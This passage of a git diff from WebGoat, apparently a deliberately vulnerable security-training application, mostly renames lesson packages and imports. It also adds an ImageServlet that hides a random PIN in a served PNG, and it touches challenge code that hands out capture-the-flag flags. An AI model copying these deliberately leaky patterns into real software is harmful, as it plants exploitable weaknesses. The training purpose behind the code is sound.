 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFrontendValidation.java b/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidation.java
similarity index 93%
rename from webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFrontendValidation.java
rename to src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidation.java
index dceb19f98..0c7bce6a0 100644
--- a/webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFrontendValidation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidation.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypass_restrictions;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/ChallengeIntro.java b/src/main/java/org/owasp/webgoat/lessons/challenges/ChallengeIntro.java
similarity index 65%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/ChallengeIntro.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/ChallengeIntro.java
index 405447e48..c3e1b1c8e 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/ChallengeIntro.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/ChallengeIntro.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.challenges;
+package org.owasp.webgoat.lessons.challenges;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 
 /**
  * @author nbaars
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/Email.java b/src/main/java/org/owasp/webgoat/lessons/challenges/Email.java
similarity index 96%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/Email.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/Email.java
index a8b9314a9..fe1eb40b2 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/Email.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/Email.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.challenges;
+package org.owasp.webgoat.lessons.challenges;
 
 import lombok.Builder;
 import lombok.Data;
@@ -41,4 +41,4 @@ public class Email implements Serializable {
     private String sender;
     private String title;
     private String recipient;
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/Flag.java b/src/main/java/org/owasp/webgoat/lessons/challenges/Flag.java
similarity index 90%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/Flag.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/Flag.java
index 77761697f..fdeb5a85a 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/Flag.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/Flag.java
@@ -20,15 +20,15 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.challenges;
+package org.owasp.webgoat.lessons.challenges;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.RequestMapping;
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/SolutionConstants.java b/src/main/java/org/owasp/webgoat/lessons/challenges/SolutionConstants.java
similarity index 96%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/SolutionConstants.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/SolutionConstants.java
index 9a9654260..c2ca6d849 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/SolutionConstants.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/SolutionConstants.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.challenges;
+package org.owasp.webgoat.lessons.challenges;
 
 /**
  * Interface with constants so we can easily change the flags
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/Assignment1.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Assignment1.java
similarity index 88%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/Assignment1.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Assignment1.java
index 7966972d0..62a865f63 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/Assignment1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Assignment1.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.challenges.challenge1;
+package org.owasp.webgoat.lessons.challenges.challenge1;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.challenges.Flag;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.challenges.Flag;
 import org.springframework.util.StringUtils;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
@@ -11,7 +11,7 @@ import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.http.HttpServletRequest;
 
-import static org.owasp.webgoat.challenges.SolutionConstants.PASSWORD;
+import static org.owasp.webgoat.lessons.challenges.SolutionConstants.PASSWORD;
 
 /**
  * ************************************************************************************************
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/Challenge1.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Challenge1.java
similarity index 67%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/Challenge1.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Challenge1.java
index 86d1edfcc..940568113 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/Challenge1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/Challenge1.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.challenges.challenge1;
+package org.owasp.webgoat.lessons.challenges.challenge1;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java
new file mode 100644
index 000000000..925ddfd4d
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java
@@ -0,0 +1,36 @@
+package org.owasp.webgoat.lessons.challenges.challenge1;
+
+import org.springframework.core.io.ClassPathResource;
+import org.springframework.http.MediaType;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServlet;
+import java.io.IOException;
+import java.security.SecureRandom;
+
+import static org.springframework.web.bind.annotation.RequestMethod.GET;
+import static org.springframework.web.bind.annotation.RequestMethod.POST;
+
+@RestController
+public class ImageServlet extends HttpServlet {
+	
+	private static final long serialVersionUID = 9132775506936676850L;
+	static final public int PINCODE = new SecureRandom().nextInt(10000);
+
+    @RequestMapping(method = {GET, POST}, value = "/challenge/logo", produces = MediaType.IMAGE_PNG_VALUE)
+    @ResponseBody
+	public byte[] logo() throws IOException {
+		byte[] in = new ClassPathResource("lessons/challenges/images/webgoat2.png").getInputStream().readAllBytes();
+		
+		String pincode = String.format("%04d", PINCODE);
+		
+		in[81216]=(byte) pincode.charAt(0);
+		in[81217]=(byte) pincode.charAt(1);
+		in[81218]=(byte) pincode.charAt(2);
+		in[81219]=(byte) pincode.charAt(3);
+
+        return in;
+	}
+}
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge5/Assignment5.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Assignment5.java
similarity index 90%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge5/Assignment5.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Assignment5.java
index 39cd6dbba..48d6f85d2 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge5/Assignment5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Assignment5.java
@@ -20,20 +20,19 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.challenges.challenge5;
+package org.owasp.webgoat.lessons.challenges.challenge5;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.challenges.Flag;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.challenges.Flag;
 import org.springframework.util.StringUtils;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.sql.DataSource;
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge5/Challenge5.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Challenge5.java
similarity index 89%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge5/Challenge5.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Challenge5.java
index ab068ff2a..6f17215c2 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge5/Challenge5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge5/Challenge5.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.challenges.challenge5;
+package org.owasp.webgoat.lessons.challenges.challenge5;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Assignment7.java
similarity index 90%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Assignment7.java
index 0f33b7d96..fab634c08 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Assignment7.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Assignment7.java
@@ -1,10 +1,11 @@
-package org.owasp.webgoat.challenges.challenge7;
+package org.owasp.webgoat.lessons.challenges.challenge7;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.challenges.Email;
-import org.owasp.webgoat.challenges.SolutionConstants;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.challenges.Email;
+import org.owasp.webgoat.lessons.challenges.SolutionConstants;
+import org.owasp.webgoat.lessons.challenges.Flag;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.core.io.ClassPathResource;
@@ -25,8 +26,6 @@ import java.net.URI;
 import java.net.URISyntaxException;
 import java.time.LocalDateTime;
 
-import static org.owasp.webgoat.challenges.Flag.FLAGS;
-
 /**
  * @author nbaars
  * @since 4/8/17.
@@ -54,7 +53,7 @@ public class Assignment7 extends AssignmentEndpoint {
         if (link.equals(SolutionConstants.ADMIN_PASSWORD_LINK)) {
             return ResponseEntity.accepted().body("<h1>Success!!</h1>"
                     + "<img src='/WebGoat/images/hi-five-cat.jpg'>"
-                    + "<br/><br/>Here is your flag: " + "<b>" + FLAGS.get(7) + "</b>");
+                    + "<br/><br/>Here is your flag: " + "<b>" + Flag.FLAGS.get(7) + "</b>");
         }
         return ResponseEntity.status(HttpStatus.I_AM_A_TEAPOT).body("That is not the reset link for admin");
     }
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Challenge7.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Challenge7.java
similarity index 67%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Challenge7.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Challenge7.java
index cbcd25f7a..df621ac17 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/Challenge7.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/Challenge7.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.challenges.challenge7;
+package org.owasp.webgoat.lessons.challenges.challenge7;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/MD5.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
similarity index 99%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/MD5.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
index 543bce623..9bc444627 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/MD5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/MD5.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.challenges.challenge7;
+package org.owasp.webgoat.lessons.challenges.challenge7;
 
 import java.io.File;
 import java.io.FileInputStream;
@@ -685,4 +685,4 @@ public class MD5 {
         state.state[2] += c;
         state.state[3] += d;
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/PasswordResetLink.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/PasswordResetLink.java
similarity index 95%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/PasswordResetLink.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/PasswordResetLink.java
index 73bf2ecc5..c890fc27c 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge7/PasswordResetLink.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge7/PasswordResetLink.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.challenges.challenge7;
+package org.owasp.webgoat.lessons.challenges.challenge7;
 
 import java.util.Random;
 
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge8/Assignment8.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Assignment8.java
similarity index 91%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge8/Assignment8.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Assignment8.java
index e83a2a631..e4f330899 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge8/Assignment8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Assignment8.java
@@ -1,9 +1,9 @@
-package org.owasp.webgoat.challenges.challenge8;
+package org.owasp.webgoat.lessons.challenges.challenge8;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.challenges.Flag;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.challenges.Flag;
 import org.springframework.http.MediaType;
 import org.springframework.http.ResponseEntity;
 import org.springframework.web.bind.annotation.GetMapping;
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge8/Challenge8.java b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Challenge8.java
similarity index 67%
rename from webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge8/Challenge8.java
rename to src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Challenge8.java
index 6d02db4e5..bb0f9ac4e 100644
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge8/Challenge8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/challenges/challenge8/Challenge8.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.challenges.challenge8;
+package org.owasp.webgoat.lessons.challenges.challenge8;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/ChromeDevTools.java b/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevTools.java
similarity index 90%
rename from webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/ChromeDevTools.java
rename to src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevTools.java
index 29c8dd9a9..cd2faeaf4 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/ChromeDevTools.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevTools.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chrome_dev_tools;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/NetworkDummy.java b/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkDummy.java
similarity index 89%
rename from webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/NetworkDummy.java
rename to src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkDummy.java
index b09328532..48c48b598 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/NetworkDummy.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkDummy.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chrome_dev_tools;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -51,4 +51,4 @@ public class NetworkDummy extends AssignmentEndpoint {
             return failed(this).feedback("xss-dom-message-failure").build();
         }
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/NetworkLesson.java b/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkLesson.java
similarity index 90%
rename from webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/NetworkLesson.java
rename to src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkLesson.java
index 14123ce80..3cc3b0230 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat/chrome_dev_tools/NetworkLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkLesson.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chrome_dev_tools;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.ResponseEntity;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/cia/src/main/java/org/owasp/webgoat/cia/CIA.java b/src/main/java/org/owasp/webgoat/lessons/cia/CIA.java
similarity index 70%
rename from webgoat-lessons/cia/src/main/java/org/owasp/webgoat/cia/CIA.java
rename to src/main/java/org/owasp/webgoat/lessons/cia/CIA.java
index 7210de301..03f5fd2bf 100644
--- a/webgoat-lessons/cia/src/main/java/org/owasp/webgoat/cia/CIA.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cia/CIA.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.cia;
+package org.owasp.webgoat.lessons.cia;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
@@ -20,4 +20,4 @@ public class CIA extends Lesson {
     public String getTitle() {
         return "4.cia.title";//4th lesson in general
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/cia/src/main/java/org/owasp/webgoat/cia/CIAQuiz.java b/src/main/java/org/owasp/webgoat/lessons/cia/CIAQuiz.java
similarity index 90%
rename from webgoat-lessons/cia/src/main/java/org/owasp/webgoat/cia/CIAQuiz.java
rename to src/main/java/org/owasp/webgoat/lessons/cia/CIAQuiz.java
index ee3e6e60d..bc7a1b0a7 100644
--- a/webgoat-lessons/cia/src/main/java/org/owasp/webgoat/cia/CIAQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cia/CIAQuiz.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.cia;
+package org.owasp.webgoat.lessons.cia;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFiltering.java b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFiltering.java
similarity index 90%
rename from webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFiltering.java
rename to src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFiltering.java
index ee1267c2b..a4648e772 100644
--- a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFiltering.java
+++ b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFiltering.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.client_side_filtering;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringAssignment.java b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignment.java
similarity index 88%
rename from webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignment.java
index 8ed518e42..c29390e6a 100644
--- a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.client_side_filtering;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringFreeAssignment.java b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignment.java
similarity index 88%
rename from webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringFreeAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignment.java
index d1ce40ab2..8394a9738 100644
--- a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringFreeAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.client_side_filtering;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/Salaries.java b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
similarity index 97%
rename from webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/Salaries.java
rename to src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
index 5a0d5fac0..55843baff 100644
--- a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/Salaries.java
+++ b/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
